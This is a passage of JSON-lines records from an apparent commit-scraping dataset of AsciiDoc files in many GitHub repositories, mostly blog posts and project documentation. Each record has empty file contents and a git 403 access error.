doc\/autoedit.asciidoc\n","repos":"alexherbo2\/kakoune,casimir\/kakoune,alpha123\/kakoune,casimir\/kakoune,zakgreant\/kakoune,danr\/kakoune,flavius\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,elegios\/kakoune,ekie\/kakoune,danr\/kakoune,xificurC\/kakoune,flavius\/kakoune,Somasis\/kakoune,alpha123\/kakoune,occivink\/kakoune,danielma\/kakoune,flavius\/kakoune,alpha123\/kakoune,Asenar\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,ekie\/kakoune,lenormf\/kakoune,lenormf\/kakoune,casimir\/kakoune,danielma\/kakoune,zakgreant\/kakoune,occivink\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,danielma\/kakoune,xificurC\/kakoune,Asenar\/kakoune,danr\/kakoune,mawww\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,flavius\/kakoune,elegios\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,Somasis\/kakoune,mawww\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,rstacruz\/kakoune,ekie\/kakoune,elegios\/kakoune,danr\/kakoune,rstacruz\/kakoune,casimir\/kakoune,xificurC\/kakoune,lenormf\/kakoune,lenormf\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,elegios\/kakoune,occivink\/kakoune,ekie\/kakoune,jkonecny12\/kakoune,occivink\/kakoune","old_file":"doc\/autoedit.asciidoc","new_file":"doc\/autoedit.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f6ebeb7101832e16b6802af6d47606bb73463d75","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/363","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/363\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a2e92f2e72434d9b3c1f46ea5f33169b79237e","subject":"y2b create post Unboxing The Biggest Bluetooth Speaker","message":"y2b create post Unboxing The Biggest Bluetooth Speaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-22-Unboxing-The-Biggest-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-07-22-Unboxing-The-Biggest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1665bd29dbf9a8b2a6d3c92a9f78ca12ba22cce8","subject":"Added the sagan adoc files","message":"Added the sagan adoc files\n","repos":"mminella\/spring-cloud-task,mminella\/spring-cloud-task,spring-cloud\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/sagan-index.adoc","new_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/sagan-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-task.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0966684fc61561be5a5730e569f4ee6245463eed","subject":"update ntp doc","message":"update ntp doc\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/basic\/ntp.adoc","new_file":"linux\/basic\/ntp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1945701af0a317074ff06d8e04d31149628dc815","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/http-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/http-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"203f3e205c90db3d399621a045cd6f72b34ac7a1","subject":"y2b create post Unboxing The New $1600 Razer Blade Stealth","message":"y2b create post Unboxing The New $1600 Razer Blade Stealth","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-12-Unboxing-The-New-1600-Razer-Blade-Stealth.adoc","new_file":"_posts\/2017-08-12-Unboxing-The-New-1600-Razer-Blade-Stealth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4da88a3fe6c15dfed1a6055e99f636db9893a99","subject":"Update 2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","message":"Update 2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","new_file":"_posts\/2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b8566b74b9fc6f42cc44b2377759f28fe412193","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"add86c14cc68d8e7797dd737992926b649c3070d","subject":"Update 2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","message":"Update 2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","new_file":"_posts\/2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0bd48b692635a83ea7807112498e7f3c6c868f3","subject":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"070d70dd3f1760afd7ae75aa32afeb0cf4ea1515","subject":"Update 2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","message":"Update 2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","new_file":"_posts\/2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcb3a59c2052ed6bd5b78af9ef4bfa1abdbaf0aa","subject":"Update 2016-07-01-My-New-Blog.adoc","message":"Update 2016-07-01-My-New-Blog.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39acaf0a4efa90c1dbf5adbd45f0aae68bbdcf6d","subject":"Deleted _posts\/2016-12-01-hello-world.adoc","message":"Deleted _posts\/2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9909462097047a1b2aa0cf59231d9c57274dffc2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74cc9578bfaf489e40f90d126c69884076f8fc77","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"edusantana\/asciidoc-highlight","old_file":"test\/README.asciidoc","new_file":"test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75d398621576a4477f47d19d87019c9238aa847d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfc9af9342fce6998dbd065c38ba4b4125d9ea80","subject":"Update 2017-03-24-create-pc.adoc","message":"Update 2017-03-24-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-24-create-pc.adoc","new_file":"_posts\/2017-03-24-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2234090bfe84dd0f7cb096cae041209deff34968","subject":"[DOCS] Edits the get tokens API (#45312)","message":"[DOCS] Edits the get tokens API (#45312)\n\n","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/security\/get-tokens.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/security\/get-tokens.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91316580cbfd003279eff041b309efc40fbea9e3","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34ab20c9aea5f628b87707ef690d021fb70b66f7","subject":"Update 2016-01-12-New-Year-New-Domain.adoc","message":"Update 2016-01-12-New-Year-New-Domain.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2016-01-12-New-Year-New-Domain.adoc","new_file":"_posts\/2016-01-12-New-Year-New-Domain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2855140ce603110abf4d81179149c471edd04ae2","subject":"Update version.","message":"Update version.\n","repos":"yurrriq\/cats,alesguzik\/cats,funcool\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ed46921f0a9bc7619de8dfb4b6a7b80bc741fb1c","subject":"Update 2017-04-06-Week-2-Player-and-Camera-Controller.adoc","message":"Update 2017-04-06-Week-2-Player-and-Camera-Controller.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-06-Week-2-Player-and-Camera-Controller.adoc","new_file":"_posts\/2017-04-06-Week-2-Player-and-Camera-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3a6257d05aee67a235249891fa1e07f82e8ac33","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf168f5f18e65bfbf04ea1d62eb965708edb2250","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18c574ad238ea77f11e4ac82cd9419f8cdfb91cb","subject":"y2b create post Ever Microwave Your Notebook?","message":"y2b create post Ever Microwave Your Notebook?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-24-Ever-Microwave-Your-Notebook.adoc","new_file":"_posts\/2016-09-24-Ever-Microwave-Your-Notebook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a112b78d66caf71b25b8fc62e26d8b792b4fd1b2","subject":"y2b create post This Old Briefcase Showed Up...","message":"y2b create post This Old Briefcase Showed Up...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-06-This-Old-Briefcase-Showed-Up.adoc","new_file":"_posts\/2017-07-06-This-Old-Briefcase-Showed-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be05b1086ae9c27ca1e5bad03f28eed04ed6381b","subject":"new post","message":"new post\n","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/words.adoc","new_file":"content\/writings\/words.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"668c50c07cbdd167e6e1859e2b090c64da531a1c","subject":"Update 2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","message":"Update 2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","new_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a46f83ad2af26f638eb06a2771c5362184da6912","subject":"[SYNCOPE-700] More adds to reference guide","message":"[SYNCOPE-700] More adds to reference guide\n","repos":"apache\/syncope,nscendoni\/syncope,giacomolm\/syncope,nscendoni\/syncope,tmess567\/syncope,ilgrosso\/syncope,securny\/syncope,NuwanSameera\/syncope,nscendoni\/syncope,tmess567\/syncope,ilgrosso\/syncope,securny\/syncope,apache\/syncope,ilgrosso\/syncope,nscendoni\/syncope,giacomolm\/syncope,NuwanSameera\/syncope,giacomolm\/syncope,securny\/syncope,apache\/syncope,tmess567\/syncope,NuwanSameera\/syncope,ilgrosso\/syncope,giacomolm\/syncope,apache\/syncope,NuwanSameera\/syncope,tmess567\/syncope,securny\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/reference-guide.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/reference-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NuwanSameera\/syncope.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b631b899b0fad1e02fa4b7b0ca8db2f01e264673","subject":"Update 2015-03-31-Test.adoc","message":"Update 2015-03-31-Test.adoc\n","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-03-31-Test.adoc","new_file":"_posts\/2015-03-31-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa4656266ee2514bef17501223694c17dbba10c2","subject":"Update 2015-09-08-Tips.adoc","message":"Update 2015-09-08-Tips.adoc","repos":"TeksInHelsinki\/en,TeksInHelsinki\/en,TeksInHelsinki\/en","old_file":"_posts\/2015-09-08-Tips.adoc","new_file":"_posts\/2015-09-08-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/en.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"831677c94626e31fa93020b7b649af05a48e66d5","subject":"y2b create post Samsung Galaxy Tab Unboxing (Bell Version)","message":"y2b create post Samsung Galaxy Tab Unboxing (Bell Version)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-04-Samsung-Galaxy-Tab-Unboxing-Bell-Version.adoc","new_file":"_posts\/2011-01-04-Samsung-Galaxy-Tab-Unboxing-Bell-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f164954a3e80d18e3c3b288290f1c229d31acc7","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21327bcc3bd2102d23e38b08c424c7ecc2580943","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25754157b46fdc621103675f33fae5fd7a4d698b","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eebc85243cfecd996f185d05cb514c8df25c5d1","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67f706d5e5e47eb945696a159198a011ecc39ad6","subject":"Update 2018-05-14-command64.adoc","message":"Update 2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cadad62bfd0ac59678d9857f4eb757431b49580f","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"Acidburn0zzz\/winreg-kb,libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Application Compatibility Cache key.asciidoc","new_file":"documentation\/Application Compatibility Cache key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a23ce24a9d2d838db6e5bcb7ada70aac9c645dd","subject":"readme for gtest gmock","message":"readme for gtest gmock\n","repos":"ajneu\/cmake,ajneu\/cmake,ajneu\/cmake","old_file":"ex2_gtest_gmock\/README.adoc","new_file":"ex2_gtest_gmock\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/cmake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f78178d5dcb448cfc2a43afe1a9226578cfea1a","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e9eb73a8cf7777f596e603b66e45aa4ee3319a6","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1599327b57bb9c7b2f60511e5cf0fae69af7f13f","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 